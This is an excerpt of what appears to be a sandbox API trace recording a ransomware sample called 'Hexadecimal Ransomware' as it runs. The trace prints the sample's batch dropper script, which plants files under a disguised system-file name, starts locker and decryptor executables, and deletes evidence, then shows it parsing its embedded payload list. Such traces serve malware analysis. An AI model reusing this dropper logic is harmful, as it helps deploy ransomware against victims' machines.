C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 490 [0075.845] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1eb) returned 0x2a920e8 [0075.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\n@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit", cchWideChar=-1, lpMultiByteStr=0x2a920e8, cbMultiByte=490, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@shift /0\r\n@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit", lpUsedDefaultChar=0x0) returned 490 [0075.845] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19feac*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19feac*=0) returned 0x0 [0075.845] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a920e8 | out: hHeap=0x2a90000) returned 1 [0075.845] WriteFile (in: hFile=0x7c, lpBuffer=0x2a910e0*, nNumberOfBytesToWrite=0x1e9, lpNumberOfBytesWritten=0x19fec8, lpOverlapped=0x0 | out: lpBuffer=0x2a910e0*, lpNumberOfBytesWritten=0x19fec8*=0x1e9, lpOverlapped=0x0) returned 1 [0075.847] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910e0 | out: hHeap=0x2a90000) returned 1 [0075.847] CloseHandle (hObject=0x7c) returned 1 [0075.854] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.856] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac38 | out: hHeap=0x2a60000) returned 1 [0075.856] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6acc8 | out: hHeap=0x2a60000) returned 1 [0075.856] GetLastError () returned 0x0 [0075.856] SetLastError (dwErrCode=0x0) [0075.856] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682c8 | out: hHeap=0x2a60000) returned 1 [0075.856] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69de8 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a0f0 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a498 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a677b0 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a568 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a868 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a3c8 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a67708 | out: hHeap=0x2a60000) returned 1 [0075.857] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a676a8 | out: hHeap=0x2a60000) returned 1 [0075.857] GetLastError () returned 0x0 [0075.857] SetLastError (dwErrCode=0x0) [0075.857] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 0x3d [0075.857] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a6a868 [0075.857] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" | out: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 0 [0075.857] GetLastError () returned 0x0 [0075.857] SetLastError (dwErrCode=0x0) [0075.857] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 0x3d [0075.857] wcslen (_String=" ") returned 0x1 [0075.857] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe") returned 0x2c [0075.857] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a69be8, Size=0xde) returned 0x2a6a8f8 [0075.857] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" | out: lpsz="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\"") returned 1 [0075.858] wcslen (_String="CC1A42CA2429AFFCE2D176556742D0F7") returned 0x20 [0075.858] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68798 [0075.858] GetLastError () returned 0x0 [0075.858] SetLastError (dwErrCode=0x0) [0075.858] GetLastError () returned 0x0 [0075.858] SetLastError (dwErrCode=0x0) [0075.858] GetLastError () returned 0x0 [0075.858] SetLastError (dwErrCode=0x0) [0075.858] GetLastError () returned 0x0 [0075.858] SetLastError (dwErrCode=0x0) [0075.858] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a910b0 [0075.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CC1A42CA2429AFFCE2D176556742D0F7", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.858] malloc (_Size=0x22) returned 0x1121150 [0075.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CC1A42CA2429AFFCE2D176556742D0F7", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CC1A42CA2429AFFCE2D176556742D0F7", lpUsedDefaultChar=0x0) returned 33 [0075.858] free (_Block=0x1121150) [0075.858] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a681c0 [0075.859] FindResourceW (hModule=0x400000, lpName="FA3B0010DD960EC64DFF4C9EFF54C06A", lpType=0xa) returned 0x859400 [0075.859] LoadResource (hModule=0x400000, hResInfo=0x859400) returned 0xc96c6c [0075.859] SizeofResource (hModule=0x400000, hResInfo=0x859400) returned 0x1d2 [0075.859] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x1d2) returned 0x10e07c8 [0075.859] FreeResource (hResData=0xc96c6c) returned 0 [0075.859] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07c8) returned 0x1d2 [0075.859] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0075.859] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a682c8 [0075.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.859] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e09a8 [0075.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e09a8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.859] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e09a8) returned 0x21 [0075.859] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a910b0 [0075.859] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a914d0 [0075.859] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910b0 [0075.859] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a914d0 | out: hHeap=0x2a90000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910d8 [0075.859] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e09a8 | out: hHeap=0x10e0000) returned 1 [0075.860] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682c8 | out: hHeap=0x2a60000) returned 1 [0075.860] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.860] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910d8 | out: hHeap=0x2a90000) returned 1 [0075.860] GetLastError () returned 0x0 [0075.860] SetLastError (dwErrCode=0x0) [0075.860] GetLastError () returned 0x0 [0075.860] SetLastError (dwErrCode=0x0) [0075.860] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1dc) returned 0x2a6a9e0 [0075.860] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.860] wcsstr (_Str="HexIF.hex:32:*1801156*HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*|", _SubStr="|") returned="|" [0075.860] GetLastError () returned 0x0 [0075.860] SetLastError (dwErrCode=0x0) [0075.860] GetLastError () returned 0x0 [0075.860] SetLastError (dwErrCode=0x0) [0075.860] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a9e0, Size=0x1da) returned 0x2a6a9e0 [0075.860] wcslen (_String="CC1A42CA2429AFFCE2D176556742D0F7") returned 0x20 [0075.860] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68848 [0075.860] GetLastError () returned 0x0 [0075.860] SetLastError (dwErrCode=0x0) [0075.860] GetLastError () returned 0x0 [0075.861] SetLastError (dwErrCode=0x0) [0076.022] wcsncpy (in: _Dest=0x2a60608, _Source="HexIF.hex:32:*1801156*HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0xd | out: _Dest="HexIF.hex:32:*1801156*HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*") returned="HexIF.hex:32:*1801156*HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*" [0076.022] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x24) returned 0x2a68af8 [0076.022] wcsstr (_Str="HexIF.hex:32:", _SubStr=":") returned=":32:" [0076.022] GetLastError () returned 0x0 [0076.022] SetLastError (dwErrCode=0x0) [0076.022] GetLastError () returned 0x0 [0076.022] SetLastError (dwErrCode=0x0) [0076.022] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32xIF.hex:32:") returned="32xIF.hex:32:" [0076.022] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xe) returned 0x2a67840 [0076.022] GetLastError () returned 0x0 [0076.022] SetLastError (dwErrCode=0x0) [0076.022] GetLastError () returned 0x0 [0076.022] SetLastError (dwErrCode=0x0) [0076.023] wcsncpy (in: _Dest=0x2a60608, _Source="HexIF.hex:32:", _Count=0x9 | out: _Dest="HexIF.hex:32:") returned="HexIF.hex:32:" [0076.023] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1c) returned 0x2a68af8 [0076.023] GetLastError () returned 0x0 [0076.023] SetLastError (dwErrCode=0x0) [0076.023] GetLastError () returned 0x0 [0076.023] SetLastError (dwErrCode=0x0) [0076.023] GetLastError () returned 0x0 [0076.023] SetLastError (dwErrCode=0x0) [0076.023] GetLastError () returned 0x0 [0076.023] SetLastError (dwErrCode=0x0) [0076.023] wcsncmp (_String1="H", _String2="?", _MaxCount=0x1) returned 9 [0076.023] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.023] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.023] wcsncmp (_String1="I", _String2="?", _MaxCount=0x1) returned 10 [0076.023] wcsncmp (_String1="F", _String2="?", _MaxCount=0x1) returned 7 [0076.023] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.023] wcsncmp (_String1="h", _String2="?", _MaxCount=0x1) returned 41 [0076.023] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.023] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.024] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1c) returned 0x2a68af8 [0076.024] GetLastError () returned 0x0 [0076.024] SetLastError (dwErrCode=0x0) [0076.024] wcslen (_String="HexIF.hex") returned 0x9 [0076.024] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1c) returned 0x2a69ca8 [0076.024] GetLastError () returned 0x0 [0076.024] SetLastError (dwErrCode=0x0) [0076.024] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.024] wcslen (_String="\\") returned 0x1 [0076.024] wcslen (_String="HexIF.hex") returned 0x9 [0076.024] wcslen (_String="\r\n") returned 0x2 [0076.024] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68378 [0076.024] GetLastError () returned 0x0 [0076.024] SetLastError (dwErrCode=0x0) [0076.024] GetLastError () returned 0x0 [0076.024] SetLastError (dwErrCode=0x0) [0076.025] wcsncpy (in: _Dest=0x2a60608, _Source="1801156*HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x7 | out: _Dest="1801156s\\FD1HVy\\Desktop\\HexIF.hex\r\n") returned="1801156s\\FD1HVy\\Desktop\\HexIF.hex\r\n" [0076.025] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x18) returned 0x2a68af8 [0076.025] wcsstr (_Str="1801156", _SubStr=":") returned 0x0 [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.025] wcsncpy (in: _Dest=0x2a60608, _Source="HexLK.hex:32:*405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0xd | out: _Dest="HexLK.hex:32:Vy\\Desktop\\HexIF.hex\r\n") returned="HexLK.hex:32:Vy\\Desktop\\HexIF.hex\r\n" [0076.025] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x24) returned 0x2a68af8 [0076.025] wcsstr (_Str="HexLK.hex:32:", _SubStr=":") returned=":32:" [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.025] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32xLK.hex:32:") returned="32xLK.hex:32:" [0076.025] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67840, Size=0xe) returned 0x2a676f0 [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.026] GetLastError () returned 0x0 [0076.026] SetLastError (dwErrCode=0x0) [0076.026] wcsncpy (in: _Dest=0x2a60608, _Source="HexLK.hex:32:", _Count=0x9 | out: _Dest="HexLK.hex:32:") returned="HexLK.hex:32:" [0076.026] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1c) returned 0x2a68af8 [0076.026] GetLastError () returned 0x0 [0076.026] SetLastError (dwErrCode=0x0) [0076.026] GetLastError () returned 0x0 [0076.026] SetLastError (dwErrCode=0x0) [0076.026] GetLastError () returned 0x0 [0076.026] SetLastError (dwErrCode=0x0) [0076.026] GetLastError () returned 0x0 [0076.026] SetLastError (dwErrCode=0x0) [0076.026] wcsncmp (_String1="H", _String2="?", _MaxCount=0x1) returned 9 [0076.026] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.026] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.026] wcsncmp (_String1="L", _String2="?", _MaxCount=0x1) returned 13 [0076.026] wcsncmp (_String1="K", _String2="?", _MaxCount=0x1) returned 12 [0076.027] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.027] wcsncmp (_String1="h", _String2="?", _MaxCount=0x1) returned 41 [0076.027] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.027] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.027] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1c) returned 0x2a68af8 [0076.027] GetLastError () returned 0x0 [0076.027] SetLastError (dwErrCode=0x0) [0076.027] wcslen (_String="HexLK.hex") returned 0x9 [0076.027] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1c) returned 0x2a69cd0 [0076.027] GetLastError () returned 0x0 [0076.027] SetLastError (dwErrCode=0x0) [0076.027] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\n") returned 0x23 [0076.027] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.027] wcslen (_String="\\") returned 0x1 [0076.027] wcslen (_String="HexLK.hex") returned 0x9 [0076.027] wcslen (_String="\r\n") returned 0x2 [0076.027] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68378, Size=0x96) returned 0x2a6abc8 [0076.027] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] wcsncpy (in: _Dest=0x2a60608, _Source="405722*rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x6 | out: _Dest="405722rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\n") returned="405722rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\n" [0076.028] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x16) returned 0x2a68af8 [0076.028] wcsstr (_Str="405722", _SubStr=":") returned 0x0 [0076.028] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] wcsncpy (in: _Dest=0x2a60608, _Source="rd000db.dll:32:*358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0xf | out: _Dest="rd000db.dll:32:\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\n") returned="rd000db.dll:32:\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\n" [0076.028] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x28) returned 0x2a68af8 [0076.028] wcsstr (_Str="rd000db.dll:32:", _SubStr=":") returned=":32:" [0076.028] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] GetLastError () returned 0x0 [0076.028] SetLastError (dwErrCode=0x0) [0076.028] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32000db.dll:32:") returned="32000db.dll:32:" [0076.029] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676f0, Size=0xe) returned 0x2a67768 [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.029] wcsncpy (in: _Dest=0x2a60608, _Source="rd000db.dll:32:", _Count=0xb | out: _Dest="rd000db.dll:32:") returned="rd000db.dll:32:" [0076.029] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x20) returned 0x2a68af8 [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.029] GetLastError () returned 0x0 [0076.029] SetLastError (dwErrCode=0x0) [0076.030] wcsncmp (_String1="r", _String2="?", _MaxCount=0x1) returned 51 [0076.030] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.030] wcsncmp (_String1="0", _String2="?", _MaxCount=0x1) returned -15 [0076.030] wcsncmp (_String1="0", _String2="?", _MaxCount=0x1) returned -15 [0076.030] wcsncmp (_String1="0", _String2="?", _MaxCount=0x1) returned -15 [0076.030] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.030] wcsncmp (_String1="b", _String2="?", _MaxCount=0x1) returned 35 [0076.030] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.030] wcsncmp (_String1="d", _String2="?", _MaxCount=0x1) returned 37 [0076.030] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.030] wcsncmp (_String1="l", _String2="?", _MaxCount=0x1) returned 45 [0076.030] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x20) returned 0x2a68af8 [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] wcslen (_String="rd000db.dll") returned 0xb [0076.030] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a69c80 [0076.030] GetLastError () returned 0x0 [0076.030] SetLastError (dwErrCode=0x0) [0076.030] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\n") returned 0x46 [0076.030] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.030] wcslen (_String="\\") returned 0x1 [0076.030] wcslen (_String="rd000db.dll") returned 0xb [0076.031] wcslen (_String="\r\n") returned 0x2 [0076.031] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0xe0) returned 0x2a6abc8 [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] wcsncpy (in: _Dest=0x2a60608, _Source="358704*SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x6 | out: _Dest="358704rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\n") returned="358704rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\n" [0076.031] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x16) returned 0x2a68af8 [0076.031] wcsstr (_Str="358704", _SubStr=":") returned 0x0 [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] wcsncpy (in: _Dest=0x2a60608, _Source="SafePC_ver1.0.dll:32:*19488*AES256Encrypt.256:32:*34918*PCRepair_rkill.dll:32:*860610*Hexadecimal_Calculator.ns:32:*12570*sorry.form:32:*792925*HexDCIF.hex:32:*55867*", _Count=0x15 | out: _Dest="SafePC_ver1.0.dll:32:op\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\n") returned="SafePC_ver1.0.dll:32:op\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\n" [0076.031] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x34) returned 0x2a68af8 [0076.031] wcsstr (_Str="SafePC_ver1.0.dll:32:", _SubStr=":") returned=":32:" [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.031] GetLastError () returned 0x0 [0076.031] SetLastError (dwErrCode=0x0) [0076.032] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32fePC_ver1.0.dll:32:") returned="32fePC_ver1.0.dll:32:" [0076.032] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xe) returned 0x2a67780 [0076.032] GetLastError () returned 0x0 [0076.032] SetLastError (dwErrCode=0x0) [0076.032] GetLastError () returned 0x0 [0076.032] SetLastError (dwErrCode=0x0) [0076.032] wcsncpy (in: _Dest=0x2a60608, _Source="SafePC_ver1.0.dll:32:", _Count=0x11 | out: _Dest="SafePC_ver1.0.dll:32:") returned="SafePC_ver1.0.dll:32:" [0076.032] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2c) returned 0x2a68af8 [0076.032] GetLastError () returned 0x0 [0076.032] SetLastError (dwErrCode=0x0) [0076.032] GetLastError () returned 0x0 